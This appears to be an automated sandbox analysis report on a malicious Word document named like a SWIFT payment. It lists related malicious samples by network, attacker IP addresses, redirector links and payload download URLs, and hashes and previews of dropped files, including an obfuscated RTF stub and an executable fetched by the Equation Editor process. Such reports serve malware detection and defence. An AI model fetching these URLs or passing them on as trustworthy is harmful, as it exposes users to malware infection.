	Payment_doc.docx	Get hash	malicious	Browse	bitly.ws/?redirect=bpNT
	PO AR483-1590436 _ J-3000 PROJT.xlsx	Get hash	malicious	Browse	tinyurl.mobi/?redirect=beAa
	http://bitly.ws/85xk	Get hash	malicious	Browse	bitly.ws/?redirect=85xk

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	WH4OtmG2dO.exe	Get hash	malicious	Browse	192.210.198.12
	mPFY2OZSiZ.exe	Get hash	malicious	Browse	192.210.198.12
	pXorUvhj09.exe	Get hash	malicious	Browse	192.210.198.12
	L2.xlsx	Get hash	malicious	Browse	192.210.173.40
	Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx	Get hash	malicious	Browse	192.210.173.40
	Request Letter for Courtesy Call.xlsx	Get hash	malicious	Browse	198.12.110.183
	ORDEN 47458.xlsx	Get hash	malicious	Browse	198.12.110.183
	Descuentos de hasta el 40%.xlsx	Get hash	malicious	Browse	198.12.110.183
	crt9O3URua.exe	Get hash	malicious	Browse	198.23.140.76
	_VM0_03064853.HtM	Get hash	malicious	Browse	23.94.52.94
	1LvgZjt4iv.exe	Get hash	malicious	Browse	198.46.177.119
	PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx	Get hash	malicious	Browse	198.23.221.170
	Purchase Order Price List 061021.xlsx	Get hash	malicious	Browse	198.12.127.155
	xYKsdzAUj8.exe	Get hash	malicious	Browse	192.210.198.12
	lsQ72VytAw.exe	Get hash	malicious	Browse	192.210.198.12
	EDxI6b8IKs.exe	Get hash	malicious	Browse	192.210.198.12
	ouGTVjHuUq.exe	Get hash	malicious	Browse	192.210.198.12
	vbc.xlsx	Get hash	malicious	Browse	107.173.219.35
	PO.xlsx	Get hash	malicious	Browse	198.12.110.183
	Duplicated Orders.xlsx	Get hash	malicious	Browse	198.12.110.183
DIGICABLEHU	i	Get hash	malicious	Browse	82.131.245.72
	2bb0000.exe	Get hash	malicious	Browse	91.83.13.48
	4JQil8gLKd	Get hash	malicious	Browse	176.241.2.125
	Copia de Pago.exe	Get hash	malicious	Browse	91.227.138.21
	Copia de Pago 23_03.exe	Get hash	malicious	Browse	91.227.138.21
	co#U00cc pia de pagamento.xlsx	Get hash	malicious	Browse	91.227.138.21
	Copia de Pago 12_03_21.exe	Get hash	malicious	Browse	91.227.138.21
	transferir copia_03_05.exe	Get hash	malicious	Browse	91.227.138.21
	transferir copia_260322.exe	Get hash	malicious	Browse	91.227.138.21
	SWIFT transferir copia_98087.exe	Get hash	malicious	Browse	91.227.138.21
	transferir copia_98087.exe	Get hash	malicious	Browse	91.227.138.21
	yVn2ywuhEC.exe	Get hash	malicious	Browse	92.249.157.115
	Astra.x86	Get hash	malicious	Browse	85.66.185.78
	3NrSrIkz3D.doc	Get hash	malicious	Browse	85.66.181.138
	68Faktura_VAT_8263562736.js	Get hash	malicious	Browse	178.164.181.105
	68Faktura_VAT_837478883422.js	Get hash	malicious	Browse	178.164.181.105
	invoice.doc	Get hash	malicious	Browse	94.21.157.195
	uTorrent Stable(3.4.2 build 37754).exe	Get hash	malicious	Browse	188.143.86.59
	qwerty2.exe	Get hash	malicious	Browse	178.164.181.93
	insurance_request (1).doc	Get hash	malicious	Browse	178.164.196.18
OGICOMPL	Next RFQ 3005590.xlsx	Get hash	malicious	Browse	93.157.97.6
	remittance-cable-from-the-bank.docx	Get hash	malicious	Browse	93.157.97.6
	remittance-cable-from-the-bank.docx	Get hash	malicious	Browse	93.157.97.6
	Revised-RBG-180129940.xlsx	Get hash	malicious	Browse	93.157.97.6
	New Year Inquiry List.xlsx	Get hash	malicious	Browse	93.157.97.6
	Payment_doc.docx	Get hash	malicious	Browse	93.157.97.6
	Payment_doc.docx	Get hash	malicious	Browse	93.157.97.6
	PO AR483-1590436 _ J-3000 PROJT.xlsx	Get hash	malicious	Browse	93.157.97.6
	DHL_Billing_Invoice 1375130042.xlsm	Get hash	malicious	Browse	93.157.100.28
	BAL_YAB_070120_HRD_072920.doc	Get hash	malicious	Browse	213.108.58.44
	FILE_QS7445385426SM.doc	Get hash	malicious	Browse	213.108.58.44
	BAL_YAB_070120_HRD_072920.doc	Get hash	malicious	Browse	213.108.58.44
	FILE_QS7445385426SM.doc	Get hash	malicious	Browse	213.108.58.44
	REP_KI7143077600NX.doc	Get hash	malicious	Browse	213.108.58.44
	REP_KI7143077600NX.doc	Get hash	malicious	Browse	213.108.58.44

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	144008
Entropy (8bit):	0.30823912921286084
Encrypted:	false
SSDEEP:	48:I3ZUA6OXAp9OgtAhjAQEpXxhUhpC9ApA0GRae2FiGQj2XGZsGor0GtMUmEBIapBi:KZOFHlBCl5G4O+xreryFlL
MD5:	B95829EAC0EEA9848A14EC3FEDEE4434
SHA1:	3182A302250C848D751C4027807EC1EC99B56867
SHA-256:	48C83212438192ACC0166D41B75C311DC97BF50FAFA7DAEE20623B91C5D63256
SHA-512:	10DE0A3C28ACFB68C0965DD66406AEED64D555516CCE6A01745D1E361C63C5E2C142DE80B9CE3CC7CEE21892FFB8DCCB58B1B9307B8D337034B3152CF2CF3662
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z1.}.go.K....=/..S,...X.F...Fa.q..............................X_!vcD..{3.a...........DPj.$}J...J..B7....................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{AD8A7C7D-3F97-4401-8621-33ABFBA7519B}.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	156816
Entropy (8bit):	0.6672055376557375
Encrypted:	false
SSDEEP:	96:KsC9hdN8sNrrQBUCRKlof7T1ZpBVmqnlPiz3/ZMT/XRBOQXp6m3y8UEzvc61Xcw7:Rf7Hcn0/X9uWcoMP+ZmEhv
MD5:	AA5DF115AAA115C450FE92554FA222D5
SHA1:	2AADB60616CD6BAD558C969A1A4B8D9C93E7AFEE
SHA-256:	D80BA711135BC820E5A9E1D09B91BFFE76B05B254E81D4168B55D049721D7CD3
SHA-512:	58D7A1CFAD1A11F5DC0069F843ADCB6F2B1F6DF351AC628065B8FBD96FC8FEAA7D3E421B3D4EBB506C515FC07B963CEC5A6D70104AFB7E9C69FFF55DEBF6E8CD
Malicious:	false
Reputation:	low
Preview:	......M.eFy...zc....`.J.j%.'...S,...X.F...Fa.q...................................B...4..]i..........DE5.B@.....o......................................................................t...t...t...t.............................................................................................................................................................................................................................................................................................................................`...O..\|..............DE5.B@.....o..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	133
Entropy (8bit):	4.273684668467034
Encrypted:	false
SSDEEP:	3:yVlgQPDRlgsRlzekRS7uIlIRAwlTlXKYWldlAWw3lCZ276:yPdPDDblzTRSCISSy67lA130Z22
MD5:	C1BAA09ECF9B8D2CB8FD5949C716D22D
SHA1:	A1E64253E9E1471A5024C318D70558C6BDF8DD02
SHA-256:	B4A86ED0B9EFD90F2CB06B912E80A53BAE138573A151186DE12DB79D95C8733E
SHA-512:	4170D7F9EDE0C28A1C6368CC53DDB4B160F98EB475F9AD7F4162CB8A1B3E97C85156FECAF88C631E2E0C7F233C05F99BCFEF4CD11575EB29DB0E76504F122C3D
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q.....H..@....b..q....]F.S.D.-.{.A.D.8.A.7.C.7.D.-.3.F.9.7.-.4.4.0.1.-.8.6.2.1.-.3.3.A.B.F.B.A.7.5.1.9.B.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	144008
Entropy (8bit):	0.30704264727101577
Encrypted:	false
SSDEEP:	48:I3Gk+OnO1+Wh6KoyQC4iq97QQPQSOEfkraZsAWzMqSzqjh6ZNxCl:KGdfQVy/cPIfQ0aZsAWzd14L
MD5:	9B5DFE2E1E6A33DB8EBCDC8538D07F05
SHA1:	850EF2323B1B9A1A50592025BC32A1C27A79253F
SHA-256:	35ECE7BC2CBB407187385A05F8F70A1FEDB3DF5D0809CDB1D156C775454EB0B3
SHA-512:	9CB2DE9BB2082DCA29B99E5F485B6EAAC5835AD8197E74AC3EE5E558CFBC9BADF57C831B4AC52040C6714326867A6EE315E91CB16671611EA46D6130981B90E7
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.M.ue..O.&.rpAlVS,...X.F...Fa.q.............................=a`.mK..e_.*.............C.K.....!.....................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{23A36F79-3DE3-41DA-8F76-5F7EB48D2868}.FSD Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	149973
Entropy (8bit):	0.27820422609280454
Encrypted:	false
SSDEEP:	48:I3XczQa3qpx0kia6q+qRIgSZfsjEc4q8U6kOOxq8U6kOO0cgRvRkDl:KXsQ8qpffoZAtX68YX68qxI
MD5:	920DC7EC50EF6DF90D30200C2FDDD0E5
SHA1:	197AD32C6AEB1182B87114AE00D1307EDB849737
SHA-256:	BB3446BB79989AB742F09F008A2E5B1BA798ADB64213C6A30BEB08CFB48A4B23
SHA-512:	863C710AAE9C482E9BEFDA4467C7B91D4D1EEE779F3290AD3C44E6DFFD0B8C98AF4D290CDFFA6DDEA789507999ECE53E20D335AE2860B6D60B52EE7C2E98E660
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z!c...t'L.p_..f.kS,...X.F...Fa.q................................6.G..HN.2.........{..3.?lE.E..o_......................................................................t...t...t...t............................................................................................................................................................................................................................................................................................................................Td..Z-G..0kj.#,........{..3.?lE.E..o_..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	133
Entropy (8bit):	4.240117800446658
Encrypted:	false
SSDEEP:	3:yVlgQPDRlgsRlzS3lNxWWCW7WSQ7WgHRHBEL7276:yPdPDDblzclLWWpWjDEf22
MD5:	51289AF5580FEA8B00E91D3796721F03
SHA1:	CF4FBE5400B99444207A5F3A8009BFC3A6902771
SHA-256:	1A1C733E011D1C41E43E26AC0F7DCE8A77B971EA9C61963005EB68CF5AD4B145
SHA-512:	F26D5A156BC128A4C5ED7C8ADE586D26EBB30F01A3ED070A860F4C2E055A529C3A385E26A43E83BEBBBA228FAB6BD8DCAA0545F2D4D350ACB97C60E06F2DBE0B
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q.....H..@....b..q....]F.S.D.-.{.2.3.A.3.6.F.7.9.-.3.D.E.3.-.4.1.D.A.-.8.F.7.6.-.5.F.7.E.B.4.8.D.2.8.6.8.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\o[1].doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	downloaded
Size (bytes):	11970
Entropy (8bit):	5.399833728537445
Encrypted:	false
SSDEEP:	192:YRCtX9b4OK8ef2u4GQI1epjkHHVi1V44jog/kNO/IBLQWWKvKNLevbMMybt4if3:YAtN8O4uu44Yi4135IJFWBIvAx42
MD5:	FDB098884C0039D65230141896DA89A9
SHA1:	5BB80B89290B64086F1DD07FBCBCE1BC608468B0
SHA-256:	D99B9F24FFDBD5BB9D8DF6ED5120D58FCC035859C943093A9F70B41CBD7B52B7
SHA-512:	92200B38E9B6A8A3B11EE9AC0854EB98C13B5EC4830227CFE4F02AA84F9BA59A373D8E1BA09EE5A6FC59FBBCC67BBF73F29E6487E28C4B330682603FFB4DEF42
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
IE Cache URL:	http://192.3.141.164/oti/o.dot
Preview:	{\rt.^+@.).+,??-$2254??=:<).!7.?.?,?`^.[<!2>#6\|?.-7>]140?'73.+]4]/._%$.?@#<.??`/((%?`[<%9<'3\|?#~042%7.^6@6,@(??.+[9225`1@1%`)~.5-9?_.(%01\|[~8?$?.=)?'?\|??`-.?!3>;\|?.4??;:.+7_<!,%7_.&)&00%+21(/?-+?>8.)?()?!.?~+:7>~7$(,5.-9(8)/.%'2(7.6&+1/1:>3(?+^%\|=1@4[_7(=<4_`9?=_]%(]?%?9!.^8')+?]5]9[(:..42?@!%~~.=~_6[-3:\|?(.)&0[?@^.=!3+#0<@>:9-~+?/$@79865~>54%%/?%>(33]+_'9%4=(_2`;.[]:!-?)/`%.,(4&]$%9253.&^$6.?$<5?#.6@2%&/,:'?).!..?.>?.$%~;'!=]?`!._!)4,2`.^`.(?&3[?,%;-(<.0-)2@&88@$4,=?\|(%%8`9[?.6)~<.0%42)='9.2>)7,79<?$.?(7#?..^.`;`#$~.!7!5@:?>4~?%'@.4%1'>&3.?]%#[!35.8=?[3'../?6%!~?7]?#/<>?-38&#?.?=/?5+~&~@/9~:=1#.3<;:35`%~8%?;&??.@/[%[\|!~0!5?&2=]=<3+%??^$1\|):#\|(`:7<<`(????)#8?><@..?7._.-?~45=&9>!4.<(~[/)/<`?../</8]==.%%.5@3'^'46?21].?)+8(^=-]+8$%)4/`3748<.(6._^~.!~[?>?-<'@259><<?&4%$]?<:-35.)?`?@?_[3.35.$;_^2&.01/)6/~&?\|@$!&.[()><~%:@&?];>6[[?8)-%/;.8`>!6=?&%;6?$_<?)-1_\|&.1!.,??31%@%_39=1?.0^?+[2+-+=<.?~8-=#;@&5?9?^]('\|@@!](2?!3]\|=%>1(2\|/,,89?`\|%?,1??1.:?]/4!1:67?~?3.1]?\|?1^,?[%`^9<0?\|..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	939008
Entropy (8bit):	7.489482502838042
Encrypted:	false
SSDEEP:	24576:TuyAioqXVnyKKvkCB7dEnfDzVd+rl7GJNeBUdt:BF1Kv1d2fDJArUJwBU
MD5:	616A10FDC3307FD483916E1B578C9F9C
SHA1:	940A937103F7F406291C416C6EC4D601FBCA7234
SHA-256:	AF9E4AF9E1C7C2991D0FE0E5EEDD11A819CB5D697EF75606AE620F3B7FD20775
SHA-512:	F31CB753E6CE0DFBBB06535A9F4CBCD655681CC610263921DBDF71D5E67438BC5E87410C9F3959CD49F6218FD0EED251418BD7ED02EDD90BCC9DC9473FBD3492
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
IE Cache URL:	http://192.3.141.164/oti/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................................. ........@.. ....................................@.....................................K..................................._................................................ ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...............................@..@.reloc...............R..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\C20Q01TC.htm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	7
Entropy (8bit):	0.9852281360342516
Encrypted:	false
SSDEEP:	3:5a:g
MD5:	9061AADDFDD374DE11E04F3B54101854
SHA1:	D1C1AA1CC4BEE4922DC94B1212EE449467828162
SHA-256:	CE708B29A47B2778D931D63DD75C230FA8D4FFFC670D73FEC68A2A378EE5A567
SHA-512:	A55636D3C6D44EE9BF473283704EC429848F835FA073E20ECF379A3CE8371E9745E9993923AA3D1CDAB747A73ACFB42771B46BF45087EF040E2C00D6C514BC5F
Malicious:	false
Reputation:	low
Preview:	.......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\e9yj[1].htm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	236
Entropy (8bit):	5.131100768196609
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPiGlWn2+KqD:J0+ox0RJWWPJuT
MD5:	011C131B3F6FFEEBF65EF2BCB8A0C76F
SHA1:	DFF1A10A3A014CB792C55C51634262FE6985890C
SHA-256:	1D541E551F8F7D9177EAD075ADE5A0C08846B039D0EB77C1EF608DDD58C58013
SHA-512:	473D68CC58BC3DEF345228E5B0BB853E10EF367DC4000C8ACC2ED97A0DC5585468DE50ED16DAF2BEC93100354327A62F2FADE583603CF63AAA6B5B137D578AC7
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="http://xy2.eu/?redirect=e9yj">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27720357.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	11970
Entropy (8bit):	5.399833728537445
Encrypted:	false
SSDEEP:	192:YRCtX9b4OK8ef2u4GQI1epjkHHVi1V44jog/kNO/IBLQWWKvKNLevbMMybt4if3:YAtN8O4uu44Yi4135IJFWBIvAx42
MD5:	FDB098884C0039D65230141896DA89A9
SHA1:	5BB80B89290B64086F1DD07FBCBCE1BC608468B0
SHA-256:	D99B9F24FFDBD5BB9D8DF6ED5120D58FCC035859C943093A9F70B41CBD7B52B7
SHA-512:	92200B38E9B6A8A3B11EE9AC0854EB98C13B5EC4830227CFE4F02AA84F9BA59A373D8E1BA09EE5A6FC59FBBCC67BBF73F29E6487E28C4B330682603FFB4DEF42
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rt.^+@.).+,??-$2254??=:<).!7.?.?,?`^.[<!2>#6\|?.-7>]140?'73.+]4]/._%$.?@#<.??`/((%?`[<%9<'3\|?#~042%7.^6@6,@(??.+[9225`1@1%`)~.5-9?_.(%01\|[~8?$?.=)?'?\|??`-.?!3>;\|?.4??;:.+7_<!,%7_.&)&00%+21(/?-+?>8.)?()?!.?~+:7>~7$(,5.-9(8)/.%'2(7.6&+1/1:>3(?+^%\|=1@4[_7(=<4_`9?=_]%(]?%?9!.^8')+?]5]9[(:..42?@!%~~.=~_6[-3:\|?(.)&0[?@^.=!3+#0<@>:9-~+?/$@79865~>54%%/?%>(33]+_'9%4=(_2`;.[]:!-?)/`%.,(4&]$%9253.&^$6.?$<5?#.6@2%&/,:'?).!..?.>?.$%~;'!=]?`!._!)4,2`.^`.(?&3[?,%;-(<.0-)2@&88@$4,=?\|(%%8`9[?.6)~<.0%42)='9.2>)7,79<?$.?(7#?..^.`;`#$~.!7!5@:?>4~?%'@.4%1'>&3.?]%#[!35.8=?[3'../?6%!~?7]?#/<>?-38&#?.?=/?5+~&~@/9~:=1#.3<;:35`%~8%?;&??.@/[%[\|!~0!5?&2=]=<3+%??^$1\|):#\|(`:7<<`(????)#8?><@..?7._.-?~45=&9>!4.<(~[/)/<`?../</8]==.%%.5@3'^'46?21].?)+8(^=-]+8$%)4/`3748<.(6._^~.!~[?>?-<'@259><<?&4%$]?<:-35.)?`?@?_[3.35.$;_^2&.01/)6/~&?\|@$!&.[()><~%:@&?];>6[[?8)-%/;.8`>!6=?&%;6?$_<?)-1_\|&.1!.,??31%@%_39=1?.0^?+[2+-+=<.?~8-=#;@&5?9?^]('\|@@!](2?!3]\|=%>1(2\|/,,89?`\|%?,1??1.:?]/4!1:67?~?3.1]?\|?1^,?[%`^9<0?\|..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{76C1187F-5961-4AD1-8352-EEED0FAE6D6A}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	3.548123695787657
Encrypted:	false
SSDEEP:	192:hA3LpYc55ibnXiWCH8PBPYQN0DIsNld0y1uBIjx+W6UFt9RC54BzV0oqaNJD0Z:G2bnXiL05Yu2d0JIjxJnLyIrsZ
MD5:	91B9BE1FBB0E36E7D0D9CE112C50B5E0
SHA1:	CDE57A76B41CF6254EF44044D845C3C898D6F610
SHA-256:	613697FBD8229A9CB415877760C4075CF35DE4146CF83964DC2C265C37AC71D7
SHA-512:	67F2E509759BA486D2584C93D109ECB401A6479C42CAFFE040A854F1F5DC00E9346BCE2CF4217ED3C7EE2D54613DBA83C94CABE2C271A9B4B747CDFB70B92FE7
Malicious:	false
Preview:	..^.+.@...)...+.,.?.?.-.$.2.2.5.4.?.?.=.:.<.)...!.7...?...?.,.?.`.^...[.<.!.2.>.#.6.\|.?...-.7.>.].1.4.0.?.'.7.3...+.].4.]./..._.%.$...?.@.#.<...?.?.`./.(.(.%.?.`.[.<.%.9.<.'.3.\|.?.#.~.0.4.2.%.7...^.6.@.6.,.@.(.?.?...+.[.9.2.2.5.`.1.@.1.%.`.).~...5.-.9.?._...(.%.0.1.\|.[.~.8.?.$.?...=.).?.'.?.\|.?.?.`.-...?.!.3.>.;.\|.?...4.?.?.;.:...+.7._.<.!.,.%.7._...&.).&.0.0.%.+.2.1.(./.?.-.+.?.>.8...).?.(.).?.!...?.~.+.:.7.>.~.7.$.(.,.5...-.9.(.8.)./...%.'.2.(.7...6.&.+.1./.1.:.>.3.(.?.+.^.%.\|.=.1.@.4.[._.7.(.=.<.4._.`.9.?.=._.]..%.(.].?.%.?.9.!...^.8.'.).+.?.].5.].9.[.(.:.....4.2.?.@.!.%.~.~...=.~._.6.[.-.3.:.\|.?.(....).&.0.[.?.@..^...=.!.3.+.#.0.<.@.>.:.9.-.~...+.?./.$.@.7.9.8.6.5.~.>.5.4.%.%./.?.%.>.(.3.3.].+._..'.9.%.4.=.(._.2.`.;...[.].:.!.-.?.)./.`.%...,.(.4.&.].$.%.9.2.5.3...&.^.$.6...?.$.<.5.?.#...6.@.2.%.&../.,.:.'.?.)...!.....?...>.?....$.%.~.;.'.!.=.].?.`.!..._.!.).4.,.2.`...^.`...(.?.&.3.[.?.,.%.;.-.(.<...0.-.).2.@.&.8.8.@.$.4.,.=.?.\|.(.%.%.8.`.9.[.?...6.).~.<...0.%.4.2.).=.'.9...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5FAB51B-61BE-41BF-89DB-AF92964D1C77}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F060F5F7-4AFC-467A-BE44-A714D3C0AD58}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	dBase III DBT, version number 0, next free block index 7536653
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.10581667566270775
Encrypted:	false
SSDEEP:	3:Ghl/dlYdn:Gh2n
MD5:	28ADF62789FD86C3D04877B2D607E000
SHA1:	A62F70A7B17863E69759A6720E75FC80E12B46E6
SHA-256:	0877A3FC43A5F341429A26010BA4004162FA051783B31B8DD8056ECA046CF9E2
SHA-512:	15C01B4AD2E173BAF8BF0FAE7455B4284267005E6E5302640AA8056075742E9B8A2004B8EB6200AA68564C40A2596C7600D426619A2AC832C64DB703A7F0360D
Malicious:	false
Preview:	..s.d.f.s.f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{27A10D79-7F70-46CF-8119-16E3C539D501} Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	137348
Entropy (8bit):	0.059665315102617286
Encrypted:	false
SSDEEP:	12:I3DPDeJBARRhfv8p+4taBA/lv1PDujYSjBAaSQapFfBAv/7yPDZr/wBA1Kp:I3ePAkttmAtvGDAaqFJAUUA6
MD5:	D0B387DA05C4FCE9F3B2A73731997139
SHA1:	7D76CD1FDD4CED7DCDC723D2629969EF6814075A
SHA-256:	420B0F142E2217052D33E15A5271085AC7DCC0E50CCEC79F301106859B089A10
SHA-512:	34771EA06C56880E0D8415F0A133DA81EE38DA84E0457445AE0E1AA2FDDD4913CB6D0128C5CCA6ADFB59CBF16EC4586396879BF06865C8419C6C183730535D8B
Malicious:	false
Preview:	......M.eFy...z1.}.go.K....=/..S,...X.F...Fa.q............................7.*..HB..!W<............DPj.$}J...J..B7....................................................................t...t...t...t...........................................................................................................................................................................................................................................................................................................................5.H..scE..zm,............DPj.$}J...J..B7................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{5C5D433B-B19C-40C3-8FD6-B75904B3140D} Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	137348
Entropy (8bit):	0.05984223626996724
Encrypted:	false
SSDEEP:	12:I3DPid4Izfv8pM1Pid4shO/1uSQap3D9Qj/7yPid4Cf2RKp:I3GbqM4S1uq3DUdu+
MD5:	E74890E2DF7355F7A20141C3FD59BCA0
SHA1:	8FAB8F7375DD1559D07758AF66FEDD59EAE8D535
SHA-256:	64FD0C13CED71412F93F51769FFC3E14A6AA805EC0029435AE1ED7A76A39307D
SHA-512:	4ADFF6FDB3B0A3D591DB08642F5C008EBF84516C1D4B28A59C9083C4EAC6B6100D53996A38A4E3AE2C9A0E29E8686C3ECD755A6EE120D948F7B6B3A39316DE41
Malicious:	false
Preview:	......M.eFy...z.M.ue..O.&.rpAlVS,...X.F...Fa.q............................7GGD..jH.y57.`.............C.K.....!.....................................................................t...t...t...t............................................................................................................................................................................................................................................................................................................................:Q...wC.p.Nz..5...........C.K.....!.................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Swift_Payment.MT103.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Fri Jun 11 21:58:30 2021, length=10331, window=hide
Category:	modified
Size (bytes):	2128
Entropy (8bit):	4.599132620127545
Encrypted:	false
SSDEEP:	48:8l/XT3Ik4UvoJA/Qh2l/XT3Ik4UvoJA/Q/:8l/XLIkM2/Qh2l/XLIkM2/Q/
MD5:	DA3D6DDFEC9FA61A95A5D3A5E93E150D
SHA1:	2F5C7C24E77F739F08AA0BE9711AE34E8B425EA7
SHA-256:	4F70427E73024F7778D5FCA4800241105F7E7788DECC42F8F11E495F58A9BFAA
SHA-512:	E335FDAD15946714E3EA184E86CC0CCC1B8E18B2FD4848D4DE223207EE51F054070FAB669DE97542B315C193384FAD4B1972D4FD8B194A41474EE929E1EE8A1B
Malicious:	false
